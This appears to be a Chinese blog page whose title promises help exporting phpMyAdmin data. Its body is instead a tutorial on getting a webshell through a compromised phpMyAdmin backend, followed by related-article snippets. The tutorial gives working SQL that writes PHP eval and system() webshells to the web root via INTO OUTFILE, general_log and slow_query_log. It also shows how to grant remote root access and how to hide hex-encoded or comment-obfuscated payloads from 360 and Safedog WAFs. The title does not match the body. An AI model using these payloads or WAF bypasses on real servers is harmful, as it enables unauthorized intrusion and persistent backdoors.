phpmyadmin 怎么导出 表中指定条件的数据_phpMyAdmin后台Getshell总结

最新推荐文章于 2025-05-07 09:31:53 发布
最新推荐文章于 2025-05-07 09:31:53 发布
阅读量955 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: phpmyadmin 怎么导出 表中指定条件的数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39581995/article/details/111653204
本文介绍了如何在phpMyAdmin中导出表中特定条件的数据,并总结了多种通过phpMyAdmin进行Getshell的方法,包括读取/导出中文路径、常规导出Webshell、利用general_log和slow_query_log_file,同时讲解了如何绕过WAF进行Getshell,特别提到了针对不同版本安全狗的绕过策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 前言

phpMyAdmin是一个以PHP为基础的MySQL数据库管理工具,管理者可以通过Web方式来控制和操作MySQL数据库。phpMyAdmin在MySQL和MariaDB上支持多种操作,可以直接在用户界面中执行常用操作,如:浏览/删除/创建/复制/删除/重命名和更改数据库、表、视图、字段和索引,管理MySQL用户帐户和权限等,也可以直接执行SQL语句。

17e237687f64087e652cda91b0217611.png

0x02 Getshell常见报错

(1) #1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement 
show global variables like "%secure%";      //查询secure_file_priv配置secure_file_prive=null                      //不允许导入导出数据到目录secure_file_priv=c:\90sec                   //允许导入导出数据到指定目录secure_file_priv=""                         //允许导入导出数据到任意目录secure_file_priv="/"                        //允许导入导出数据到任意目录
注: 在my.ini、my.cnf、mysqld.cnf文件中找到secure_file_prive并将其值设置为空""或斜杠"/",然后重启MySQL服务即可! 1f5e6ac1c7a0368f2231820d67b386e9.png
(2) #1045 - Access denied for user 'root'@'localhost' (using password: YES) 
select * from mysql.user;                                //查询所有用户权限select * from mysql.user where user="root";              //查询root用户权限update user set File_priv ='Y' where user = 'root';      //允许root用户读写文件update user set File_priv ='N' where user = 'root';      //禁止root用户读写文件flush privileges;                                        //刷新MySQL系统权限相关表
56a3e1abf5d80386e21d2b0a38f40341.png

0x03 Getshell方式小结

(1) 读取/导出中文路径
load data infile 'C:\\phpStudy\\WWW\\90sec.php' into table user;select load_file(concat('C:\\phpStudy\\WWW\\',unhex('b2e2cad4') ,'\\90sec.php'));set character_set_client='gbk';set character_set_connection='gbk';set character_set_database='gbk';set character_set_results='gbk';set character_set_server='gbk';select '<?php  eval($_POST[pass]);?>' into outfile 'C:\\phpStudy\\WWW\\测试\\90sec.php';
(2) 常规导出Webshell-1
Create TABLE shadow9 (content text NOT NULL);Insert INTO shadow9 (content) VALUES('<?php  @eval($_POST[pass]);?>');select content from shadow9 into outfile 'C:\\phpStudy\\WWW\\90sec.php';DROP TABLE IF EXISTS `shadow9`;
0f811a7cd089abf1e9b12145cf197fb9.png
(3) 常规导出Webshell-2
select '<?php  @eval($_POST[pass]);?>' into outfile 'c:/phpstudy/www/90sec.php';  select '<?php  @eval($_POST[pass]);?>' into outfile 'c:\\phpstudy\\www\\90sec.php';select '<?php  @eval($_POST[pass]);?>' into dumpfile 'c:\\phpstudy\\www\\bypass.php';select '<?php  echo \'
\';system($_GET[\'cmd\']); echo \'
into  outfile  'C:\\phpStudy\\WWW\\90sec.php'; 21c3836a0f5ae7bf7d1e48d95fd69e1a.png
(4) general_log Getshell
show global variables like "%genera%";                      //查询general_log配置set global general_log='on';                                //开启general log模式SET global general_log_file='C:/phpStudy/WWW/cmd.php';      //设置日志文件保存路径SELECT '<?php  phpinfo();?>';                                //phpinfo()写入日志文件set global general_log='off';                               //关闭general_log模式
07416eb8a157077e0e3e02e1b0b20b99.png fda9cba8ed79f00dbd463acaddd2b24f.png 注: 高版本MySQL数据库中一般都默认配置了secure_file_priv变量值为null,限制了文件的导入导出,这时我们可以尝试利用MySQL的general_log和slow_query_log日志文件写入Webshell。
(5) slow_query_log_file Getshell
show variables like 'slow_query_log_file';set global slow_query_log=on;set global slow_query_log_file="C:\\phpStudy\\WWW\\shell.php";select sleep(15),'<?php  phpinfo();?>';set global slow_query_log=off;

注:利用general_log或slow_query_log在成功写入Webshel后建议立即OFF关闭,否则可能会因为php.ini配置文件中的memory_limit参数设定的内存值太小而出现“内存不足”的报错。

535b81c0d6d5135601275c3ee0018c54.png Windows报错: 
#29 - File 'C:\phpStudy\PHPTutorial\testing\cmd.php' not found (Errcode: 13)
Linux报错: 
#1231 - Variable 'general_log_file' can't be set to the value of '/home/wwwroot/default/cmd.php'
出错原因: 
MySQL运行用户与网站目录对应用户的写入/修改权限问题,需要给予网站目录所需权限才能解决该问题!
24334ce979802a7fd2c7d3e0b1ae0395.png 40bd7a3e153ed4f51afbc128f8cbac0e.png
(6) 绕过WAF Getshell-1
phpMyAdmin导出Webshell时如果遇到WAF可能就会被拦截,因为WAF会检测我们提交的POST、GET数据包内容中是否含有危险函数、SHELL特征等,如果有则拦截, 没有则放行 。 这时我们可以尝试开启外链来执行导出Webshell的SQL语句,因为这样走的不是POST、GET方式,所以这样执行SQL语句是不会被WAF拦截的。 
grant all privileges on *.* to 'root'@'%' identified by 'root' with grant option;    //开启MySQL外链flush privileges;                          //刷新MySQL系统权限相关表
a960d54e3ac93914742ca70740a71dc2.png
(7) 绕过WAF Getshell-2
检测我们提交SQL语句的POST、GET数据包中是否包含的有WAF特征库中的危险函数、SHELL特征等,如:select、outfile、eval、assert等这样的就会被拦截。 
select '<?php @eval($_POST[pass]);?>' into outfile 'c:/phpstudy/www/90sec.php';

fdef46acec4540af4983ad42792f0f8f.png

绕过360网站卫士: 
select '<?php @eval($_POST[pass]);?>' into /*!50001outfile*/ 'c:/phpstudy/www/bypass.php';

绕过网站安全狗(<4.0):

select 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';

注:Hex编码,提交时虽然会显示拦截,但其实[过狗马]已经被写进去了!

绕过网站安全狗(4.0正式版):

/*!50001select*/ 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';
626f13066c5ccdec1df1d35a0abd7d6f.png
getshellphpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 984
访问一下 最后getshell
phpmyadmin后台GetShell总结
李火火的安全圈
02-18 601
文章目录前言一、phpmyadmin简介二、phpmyadmin寻找、登录三、利用函数写入文件四、secure_file_priv函数五、日志文件写入Webshell六、通过慢查询方式getshell七、phpmyadmin4.8.1远程文件包含漏洞影响版本漏洞分析及复现漏洞防范 前言 文章仅用于技术学习与安全研究,切勿用于非授权下的渗透行为,出现任何后果与本文作者无关。 !!!且行且珍惜!!! 一、phpmyadmin简介 phpmyadmin是一个以PHP为基础,以web-base方式架构在网站
利用phpMyAdmin导入和导出mysql数据(图解)
07-01
阅读该文件,需下载pdf阅读器<br>下载地址是http://www.skycn.com/search.php?ss_name=pdf&sor=00&sf=default
phpmyadmin 怎么导出 指定条件数据_phpmyadmin怎么导出数据库?
weixin_39616003的博客
12-21 938
phpmyadmin是项目开发中最常用的数据库管理器之一。我们可以通过phpmyadmin数据库进行创建、备份,导入导出等操作。下面本篇文章就来给大家介绍一下phpmyadmin怎么导出数据库?phpmyadmin导出数据库的操作步骤:步骤一:登录phpmyadmin通过链接 http://127.0.0.1/phpmyadmin或者http://localhost/phpmyadmin打开登录...
[ERR] 1231 - Variable ‘time_zone‘ can‘t be set to the value of ‘NULL‘
最新发布
qq_35755861的博客
05-07 431
遇到错误时,通常是由于 SQL 文件中的TIME_ZONE变量设置问题或 MySQL 配置问题导致的。
PHP:phpmyadmin 将查询数据导出csv
一些平时在开发过程中遇到的常见问题,分享给大家
05-29 452
phpmyadmin 将查询数据导出csv
MySQL查询日志
stand_forever的博客
12-05 1137
MySQL查询日志介绍 MySQL的查询日志记录了所有MySQL数据库请求的信息。无论这些请求是否得到了正确的执行。默认文件名为hostname.log。默认情况下MySQL查询日志是关闭的。生产环境,如果开启MySQL查询日志,对性能还是有蛮大的影响的。另外很多时候,MySQL慢查询日志基本可以定位那些出现性能问题的SQL,所以MySQL查询日志应用的场景其实不多,它跟SQL Server中的profiler有点类似,但是这个不能跟踪某个会话、用户、客户端。它只能对整个数据库进行跟踪。MyS...
错误代码: 1231Variable ‘sql_notes‘ can‘t be set to the value of ‘NULL‘
码字码字码字
11-27 1276
SQL 注释输出通常是通过设置系统变量 'sql_notes' 来控制的。如果将 'sql_notes' 设置为 1,MySQL 服务器将输出所有 SQL 语句的注释信息;如果将 'sql_notes' 设置为 0,MySQL 服务器将禁止输出 SQL 语句的注释信息。'sql_notes' 是一个系统变量,用于控制 MySQL 服务器是否输出执行的 SQL 语句的注释信息。你试图将变量 'sql_notes' 设置为 NULL,但是该变量不允许被设置为 NULL。值 1 示启用 SQL 注释输出。
phpMyAdmin后台getshell复现
09-18
本教程详细介绍了如何通过phpMyAdmin后台实现getshell复现。首先,需要通过弱口令等方法获得phpMyAdmin的登录权限。一旦登录后,攻击者可以利用phpMyAdmin的日志记录功能来执行特定的操作,进而实现getshell。具体...
apache的网站配置目录_网站后台getshell的方法总结
weixin_39977776的博客
11-06 653
方法一:直接上传getshell以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下:即可成功上传大马,并成功执行,从而拿下webshell。坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用../跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名方法二:数据库备份getshell以南方数据cms为例:1,首先上传一张图片马...
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 2316
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
phpMyAdmin - 数据库导入与导出(Mysql)
王二红
10-10 4729
前言 有时候,我们在本地环境写好逻辑及创建的数据库后,需要部署到服务器上,代码直接复制过去就好了,但数据库需要涉及导入与导出导出 本地环境 在本地环境中,你需要登录 phpMyAdmin 进行导出操作: 导出后,你会得到一个 .*sql 文件,如下图所示: 导入 部署环境(服务器) 得到本地环境中导出数据库后,需要在服务器环境的 phpMyAdmin 执行导入操作: ...
mysql1231错误_Error Code: 1231. Variable 'slow_query_log_file'|mysql权限问题
weixin_35888603的博客
02-02 1791
mysql> set global slow_query_log_file='/var/log/slow.log';ERROR 1231 (42000): Variable 'slow_query_log_file' can't be set to the value of '/var/log/slow.log'resolvedThe problem was in permissions t...
解决mysql [ERR] 1231 Variable ‘time_zone‘ can‘t be set to the value of ‘NULL‘
Merandღ的博客
12-13 3118
1.在使用阿里云PolarDB-X 2.0 mysql实例导入数据时遇到[ERR] 1231 Variable 'time_zone' can't be set to the value of 'NULL' 报错 2.修改max_allowed_packet=1024M参数后未能解决。 3.删除sql文件开头和结尾的注释 4.重新导入数据库没用报错了。 ...
mysql 日志 博客,基于general_log的mysql日志追踪​
weixin_35919843的博客
03-17 469
基于mysql的general_log 可以实现日志追踪,这在平时的开发调试中非常有用。首先可以通过showvariableslike'general_log';--查看日志是否开启来查看mysqlServer的日志状态,默认是关闭的,因为这个日志的量非常大对资源是一个比较大的开销,所以千万不要在生产环境中开启这个功能!+---------------+-------+|Variab...
phpmyadmin导出mysql查询的数据为excel分号格式转换为列
丁丁丁梦涛的博客
05-04 4116
工作中,使用phpmyadmin导出mysql查询的数据为excel文件,但是数据之间是用分号“;”隔开的,那么如何快速转换为正常的列格式呢? 下面我们进行演示: 1.打开导出的excel文件,如下图: 2.点击“数据” => “分列” => “下一步”,如下图: 3.弹出框里面,取消勾选“Tab键”,选择勾选“分号”,点击“下一步”,如下图: 4.编辑列数据格式
复现phpmyadmin后台getshell
09-12
复现phpMyAdmin后台GetShell通常指的是利用phpMyAdmin的漏洞执行未授权的代码,从而获得对服务器的控制。这通常需要以下条件: 1. 存在已知漏洞:首先,phpMyAdmin需要存在可以被利用的已知安全漏洞。这可能是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值